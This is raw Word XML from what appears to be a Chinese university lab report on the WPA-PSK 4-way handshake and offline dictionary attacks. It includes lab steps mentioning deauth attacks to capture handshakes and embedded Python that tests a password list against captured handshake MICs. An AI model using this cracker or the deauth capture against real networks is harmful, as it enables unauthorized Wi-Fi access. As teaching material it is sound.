          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的认证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCE5EF" w14:textId="66D239DF" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="48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lastRenderedPageBreak/>
        <w:t>MSG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC39A7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第三个握手包中，传输的重要信息包括 MIC 字段和 WPA key data 字段。通过 MIC 字段，AP 可以向 STA 认证自己。如果通过验证，这表明 AP 知道 PTK，进而知道 PMK。这里计算 MIC 的方法和前面相同。如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FBA812" w14:textId="04BB7A24" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1554001A" wp14:editId="5294AC2D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5298477" cy="3250120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="251" name="image38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386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8477" cy="3250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77AC3A" w14:textId="17DBCCBE" w:rsidR="00DC39A7" w:rsidRPr="00DC39A7" w:rsidRDefault="005D70F8" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过上面的原理，我们就可以通过穷举法来找到正确的 PSK。实际攻击中，我们会从字典中选择 PSK，然后计算 PMK，然后 PTK，然后 MIC，直至找到的 PSK 所计算出的 MIC 和握手包里面的 MIC 匹配，从而找到了正确的 PSK。这种攻击称为离线字典攻击，其成功的关键在于用户使用了弱口令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF32BB" w14:textId="7D4CE827" w:rsidR="00FF023E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五</w:t>
      </w:r>
      <w:r w:rsidR="00FF023E">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00FF023E">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00FF023E">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359893BA" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置无线网络攻击环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39681B2A" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="160"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓取无线网络握手包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6F6DE" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="161"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>编写程序破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WPA-PSK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE9DC0" w14:textId="0A7315E2" w:rsidR="005A1724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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>六</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验器材（设备、元器件）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6E794" w14:textId="3FF0252B" w:rsidR="00B31FA3" w:rsidRPr="005D70F8" w:rsidRDefault="00FF023E" w:rsidP="001232FA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>台式机一台，能够安装一台 ubuntu 虚拟机，能够访问互联网。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190EDEFA" w14:textId="1530ABE6" w:rsidR="005A1724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七</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB1F465" w14:textId="77777777" w:rsidR="00C51568" w:rsidRPr="007D3910" w:rsidRDefault="00C51568" w:rsidP="00C51568">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B508A9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤一、环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F98B2D" w14:textId="77777777" w:rsidR="00C51568" w:rsidRPr="007D3910" w:rsidRDefault="00C51568" w:rsidP="00C51568">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007D3910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>配置无线网络抓包环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D17EF" w14:textId="77777777" w:rsidR="00C51568" w:rsidRPr="007D3910" w:rsidRDefault="00C51568" w:rsidP="00C51568">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B508A9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤二、抓取无线网络握手包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C1CD1" w14:textId="77777777" w:rsidR="00C51568" w:rsidRPr="00BA0FC3" w:rsidRDefault="00C51568" w:rsidP="00C51568">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007D3910">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>测试简单无线网络攻击如deauth等，抓取WPA-PSK握手包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1BF7FB" w14:textId="0BF0F6BB" w:rsidR="00E55E2E" w:rsidRDefault="00C51568" w:rsidP="00F101A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三、编写程序破解 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA-PSK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的口令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1568" w14:paraId="51DCEC5E" w14:textId="77777777" w:rsidTr="00C51568">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65195B3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import math</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CC9250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>import hmac</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B15D84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from binascii import a2b_hex, b2a_hex </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10173E7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from hashlib import pbkdf2_hmac, sha1, md5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C41BE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0C6EF0A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171386B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def PRF(key, A, B):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632510D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Number of bytes in the PTK </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2003346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nByte = 64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FE7E1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i = 0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F38A31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 = b''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD61FB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Each iteration produces 160-bit value and 512 bits are required </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438BB8A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while(i &lt;= ((nByte * 8 + 159) / 160)):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62388EB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hmacsha1 = hmac.new(key, A + chr(0x00).encode() + B + chr(i).encode(),sha1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC8532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R = R + hmacsha1.digest() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562AFA5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i += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D319D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eturn R[0:nByte]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EDA72DF" w14:textId="78123653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0D75A68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7582A13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Make parameters for the generation of the PTK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6FDE2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aNonce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aNonce from the 4-way handshake #sNonce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sNonce from the 4-way handshake #apMac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AC address of the access point #cliMac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AC address of the client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AB2F7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return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(A, B) where A and B are parameters #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for the generation of the PTK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4A227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def MakeAB(aNonce, sNonce, apMac, cliMac): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A18BE2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 = b"Pairwise key expansion"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52434A8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B = min(apMac, cliMac) + max(apMac, cliMac) + min(aNonce, sNonce) + max(aNonce, sNonce)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8F535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ab/>
              <w:t>return (A, B)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="677D2E2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4861AB6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65F9383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Compute the 1st message integrity check for a WPA 4-way handshake #pwd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password to test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24EEF08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sid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ssid of the AP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8EFEC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A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b'Pairwise key expansion'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D102E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B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apMac, cliMac, aNonce, and sNonce concatenated #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like mac1 mac2 nonce1 nonce2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A69B720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uch that mac1 &lt; mac2 and nonce1 &lt; nonce2 #data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 list of 802.1x frames with the MIC field zeroed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A34B0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return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(x, y, z) where x is the mic, y is the PTK, and z is the PMK </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4781FD8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def MakeMIC(pwd, ssid, A, B, data, wpa = False):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E7B71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Create the pairwise master key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346732F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mk = pbkdf2_hmac('sha1', pwd.encode('ascii'), ssid.encode('ascii'), 4096, 32) #Make the pairwise transient key (PTK)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761BDAA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tk = PRF(pmk, A, B)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259FB16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WPA uses md5 to compute the MIC while WPA2 uses sha1 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A657E9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hmacFunc = md5 if wpa else sha1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B5DC8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Create the MICs using HMAC-SHA1 of data and return all computed values </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D98B6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s = [hmac.new(ptk[0:16], i, hmacFunc).digest() for i in data]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C57A8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eturn (mics, ptk, pmk)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33FB83C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52FA922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71C5B27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Run a brief test showing the computation of the PTK, PMK, and MICS #for a 4-way handshake</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485D5AD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>def RunTest():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40721C6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the pre-shared key (PSK) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B88DC1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sk = "abcdefgh"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67232C5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sid name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B699A0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sid = "Harkonen" #ANonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D466811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Nonce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 a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01131B2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Nonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5504C1B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Nonce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59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570") #Authenticator MAC (AP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3288659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apMac = a2b_hex("00146c7e4080") #Station address: MAC of client </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AD5A0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cliMac = a2b_hex("001346fe320c") #The first MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56644730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1 = "d5355382b8a9b806dcaf99cdaf564eb6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600BEB8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entire 802.1x frame of the second handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44588EB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1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 a2b_hex("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1468AE9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second MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EFDDC9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2 = "1e228672d2dee930714f688c5746028d"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C03BC7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entire 802.1x frame of the third handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7661B22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2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010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3d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>fb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFCD10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third MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EC807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3 = "9dc81ca6c4c729648de7f00b436335c8"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71093D8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entire 802.1x frame of the forth handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8A5E41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3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0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794EA0F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Create parameters for the creation of the PTK, PMK, and MICs </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58828DF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, B = MakeAB(aNonce, sNonce, apMac,cliMac)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="238CC2A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Generate the MICs, the PTK, and the PMK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A14418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s, ptk, pmk = MakeMIC(psk, ssid, A, B, [data1, data2, data3]) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2623C9F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Display the pairwise master key (PMK)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4607D95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362A3C9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mkStr = b2a_hex(pmk).decode().upper() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D645AF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pmk:\t" + pmkStr + '\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E022F8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Display the pairwise transient key (PTK) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E58B8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tkStr = b2a_hex(ptk).decode().upper() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4525C8A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ptk:\t" + ptkStr + '\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55907581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Display the desired MIC1 and compare to target MIC1 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F8BBD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1Str = mic1.upper()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4B091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desired mic:\t" + mic1Str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA9677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Take the first 128-bits of the 160-bit SHA1 hash </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F40AF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Str = b2a_hex(mics[0]).decode().upper()[:-8] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D55769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actual mic:\t" + micStr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B2E53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ab/>
              <w:t xml:space="preserve">print('MATCH\n' if micStr == mic1Str else 'MISMATCH\n') #Display the desired MIC2 and compare to target MIC2 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0410DDA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2Str = mic2.upper()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1613311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desired mic:\t" + mic2Str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79503E9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Take the first 128-bits of the 160-bit SHA1 hash </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167EEA6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1DF30B1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Str = b2a_hex(mics[1]).decode().upper()[:-8] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFE635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actual mic:\t" + micStr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D364B4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MATCH\n' if micStr == mic2Str else 'MISMATCH\n') #Display the desired MIC3 and compare to target MIC3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F3165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3Str = mic3.upper()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06AC29B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desired mic:\t"+mic3Str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15C9613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Take the first 128-bits of the 160-bit SHA1 hash </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A27D7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Str = b2a_hex(mics[2]).decode().upper()[:-8] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B481A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"actual mic:\t" + micStr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CDE65F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MATCH\n' if micStr == mic3Str else 'MISMATCH\n') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AFB8CF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eturn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5B31A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ests a list of passwords; if the correct one is found it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488C924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53D5B4D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prints it to the screen and returns it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48879BA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 list of passwords to test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156A758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sid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ssid of the AP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302BE0E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aNonce: The ANonce as a byte array #sNonce: The SNonce as a byte array #apMac: The AP's MAC address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E5F2F5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cliMac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AC address of the client (aka station)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A721D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data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802.1x frame of the second message with the MIC field zeroed #data2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802.1x frame of the third message with the MIC field zeroed #data3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802.1x frame of the forth message with the MIC field zeroed #targMic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IC for message 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACB53F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>#targMic2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IC for message 3 #targMic3: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The MIC for message 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4561BA9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def TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data, data2, data3, targMic, targMic2, targMic3):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513F4C9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Pre-computed values</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0469A5E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, B = MakeAB(aNonce, sNonce, apMac, cliMac) #Loop over each password and test each one</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640F5EF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for i in S:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBB432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, _, _ = MakeMIC(i, ssid, A, B, [data])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770D3BE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v = b2a_hex(mic[0]).decode()[:-8]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C051A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First MIC doesn't match </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0A59C0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if(v != targMic):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A21F6E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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640A328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First MIC matched... Try second</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7640E50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2, _, _ = MakeMIC(i, ssid, A, B, [data2]) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329FB0D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v2 = b2a_hex(mic2[0]).decode()[:-8]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334FD37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if(v2 != targMic2): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187142C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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C1B49A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First 2 match... Try last</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE6179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mic3, _, _ = MakeMIC(i, ssid, A, B, [data3]) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F24AA7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v3 = b2a_hex(mic3[0]).decode()[:-8]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CAD700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if(v3 != targMic3): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74B0791D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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312337E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All of them match print('!!!Password Found!!!') print('Desired MIC1:\t\t' + targMic) print('Computed MIC1:\t\t' + v)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F25A2F8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\nDesired MIC2:\t\t' + targMic2) </w:t>
            </w:r>
